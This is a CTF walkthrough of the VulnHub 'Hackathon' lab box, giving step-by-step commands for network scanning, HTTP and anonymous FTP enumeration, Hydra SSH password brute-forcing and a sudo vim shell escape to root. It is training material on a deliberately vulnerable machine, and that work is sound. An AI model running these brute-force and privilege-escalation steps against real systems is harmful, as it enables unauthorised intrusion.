Hackathon CTF VulnHub | Writeup | Walkthrough
Hello, friends I’m Shams Ul Mehmood and this is my 7th article. This article is a walkthrough of all about Hackathon CTF Box. It includes some type of security flaws like Enumeration, Network Scanning, Anonymous FTP logins, SSH Credential Brute-forcing and Abusing improperly set Root Privileges for Privilege Escalation. You can download this Vulnhub box from here.
Pentesting Methodology
- Getting the target machine IP Address by using arp-scan
- Getting open port details by using the Nmap Tool
- Enumerating HTTP service with Dirb / Nikto / Gobuster Utilities
- Enumerating FTP service and reading the first flag
- SSH brute-forcing with Hydra
- Getting the root and reading the flag
Step-1:
📌️ In the first step of the scanning, I used the arp-scan commands to perform a Local Network Scan to find out the IP Address of the target box.
Command : sudo arp-scan 192.168.163.0/24
Step-2:
📌️ In second step, after getting the victim machine’s IP address now I performed a Nmap scan to my victim. I used,
- -sS : to scan running services.
- -sV : to scan application version.
- -p- : to scan all ports on victim machine.
- -sC : to scan default script.
- -Pn : to skip host discovery.
- -O : to scan Operating System.
- -A : to enable scanning for OS, version, script detection and traceroute
Command : sudo nmap -A -p- -Pn -O -sV -sC -sS 192.168.163.131
Step-3:
📌 In this step, I was trying to enumerate the HTTP webpage. When I open the victim ip address with default port 80 and http protocol in browser.
Command : http://192.168.163.131:80
📌 I used the various tools like dirb, gobuster and nikto to enumerate interesting hidden files and directories on this target machine.
📌 Then I used dirb and nikto on victim ip address with default HTTP protocol and their port (80) and in this scan I found multiple directories and files like index.html and robots.txt.
Command : dirb http://192.168.163.131
Command : nikto -h 192.168.163.131
📌 Then I used gobuster on victim ip address with default HTTP protocol and their port (80) and in this scan I found multiple directories and files like index.html, happy and robots.txt.
Command : sudo gobuster dir -w /usr/share/wordlists/dirb/big.txt -u http://192.168.163.131
Step-4:
📌 In step-4th, here anonymous ftp access is allowed. Then, I was download the required files on Attacker machine from victim by using following command.
Command : wget -r ftp://192.168.163.131
📌 Then I was list the various files and directory on current desktop directory then I was found a new directory named 192.168.163.131 on my current directory, then after change my current directory then I was found two interesting files inside this 192.168.163.131 directory.
Command : ls -al
Command : ls ./192.168.163.131
Command : cd 192.168.163.131
Command : ls
📌 Then I was displayed the content of flag1.txt file.
Command : cat flag1.txt
📌 Then I was showed the content of word.dir file, there is a dictionary file which we can use to bruteforce different logins.
Command : cat word.dir
Step-5:
📌 In this step, Hydra is a tool that does online bruteforcing. On the other hand, there are offline password cracking tools as well like John the Ripper.
Command : ls
Command : hydra -l hackathonll -P word.dir ssh://192.168.163.131:7223 -I
📌 Next, I am going to use the dictionary list to bruteforce the SSH service running at port 7223. So, I logged in to the FTP server.
Command : ssh hackathonll@192.168.163.131 -p 7223
Command : id
Command : whoami
Command : ls
Command : cd /
Command : sudo -l
📌 However, while searching for the next clue, I looked at my sudo permissions.
📌 Luckily, we could use vim editor as root without requiring the password of root.
Command : sudo -u root /usr/bin/vim
📌 I was used ‘:!sh’ command for the closing of vim editor, after I got the root shell and the root flag.
Command : id
Command : cd /root
Command : ls
Command : cat flag2.txt
CTF Game Over : I am Root!
\( ゚ヮ゚)/🏆 🏆🎯🏅 🚀
📈⭐🧑🎤🎭💯
⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
⣿⣿⠋⠁⠈⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠁⠈⠙⣿⣿
⣿⣿⡄⠀⠀⠘⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠃⠀⠀⢠⣿⣿
⣿⣿⣿⡀⠀⠀⢹⣿⣿⣿⣿⣿⠟⠉⠀⠀⠉⠻⣿⣿⣿⣿⣿⡏⠀⠀⢀⣿⣿⣿
⣿⣿⣿⣧⠀⠀⠀⢻⣿⣿⣿⡇⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⡟⠀⠀⠀⣼⣿⣿⣿
⣿⣿⣿⣿⡄⠀⠀⠈⢿⣿⣿⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⡿⠁⠀⠀⢠⣿⣿⣿⣿
⣿⣿⣿⣿⣷⠀⠀⠀⠈⢿⣿⠀⠀⠀⠀⠀⠀⠀⠀⣿⡿⠁⠀⠀⠀⣾⣿⣿⣿⣿
⣿⣿⣿⣿⣿⣧⠀⠀⠀⠈⢻⡆⠀⠀⠀⠀⠀⠀⢰⡟⠁⠀⠀⠀⣼⣿⣿⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣇⠀⠀⠀⢸⣿⣦⡀⠀⠀⢀⣴⣿⡇⠀⠀⠀⣸⣿⣿⣿⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣦⠀⠀⠈⣇⠸⣿⠒⠒⣿⠇⣸⠁⠀⠀⣴⣿⣿⣿⣿⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣿⡀⠀⠀⣿⡀⢿⡄⢠⡿⢀⣿⠀⠀⢀⣿⣿⣿⣿⣿⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣿⡇⠀⠀⠸⣧⠘⣷⣾⠃⣼⠇⠀⠀⢸⣿⣿⣿⣿⣿⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣿⡇⠀⠀⠀⢹⡶⠛⠛⢶⡏⠀⠀⠀⢸⣿⣿⣿⣿⣿⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣿⣿⠀⠀⠀⠘⣧⣀⣀⣼⠃⠀⠀⠀⣿⣿⣿⣿⣿⣿⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣿⣿⣶⣶⣶⣶⣶⣿⣿⣶⣶⣶⣶⣶⣿⣿⣿⣿⣿⣿⣿⣿⣿